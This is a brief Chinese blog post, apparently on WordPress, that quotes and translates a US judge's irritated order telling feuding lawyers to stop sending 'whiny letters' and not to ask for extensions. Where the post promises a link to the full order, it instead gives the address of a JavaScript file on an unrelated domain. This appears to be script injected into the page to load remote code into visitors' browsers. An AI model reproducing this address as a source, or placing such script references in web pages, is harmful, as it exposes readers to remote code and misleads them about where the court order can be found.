分類
法律

不爽的法官

太有趣的法庭命令!真想知道此案的律師們究竟做了什麼,讓法官這麼不爽?
命令第一句就說:「本庭已經收到雙方的"騷擾信",你們這些律師究竟有什麼毛病?!不准再搞!("The court is in receipt of the parties’ whiny letters. What is wrong with you parties/lawyers? Just STOP IT!" )」
最後兩句也很氣勢十足:
「任何申請超過最後期限都不會被接受,不准問理由!
這是我處理最久也最討厭的案子,也請雙方律師盡量別成為我最討厭的律師。(There will be no extension granted on the motion deadline -DON’T ASK.
This is my oldest and least favorite case. Please stop trying to become my least favorite lawyers.)」

命令全文連結

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s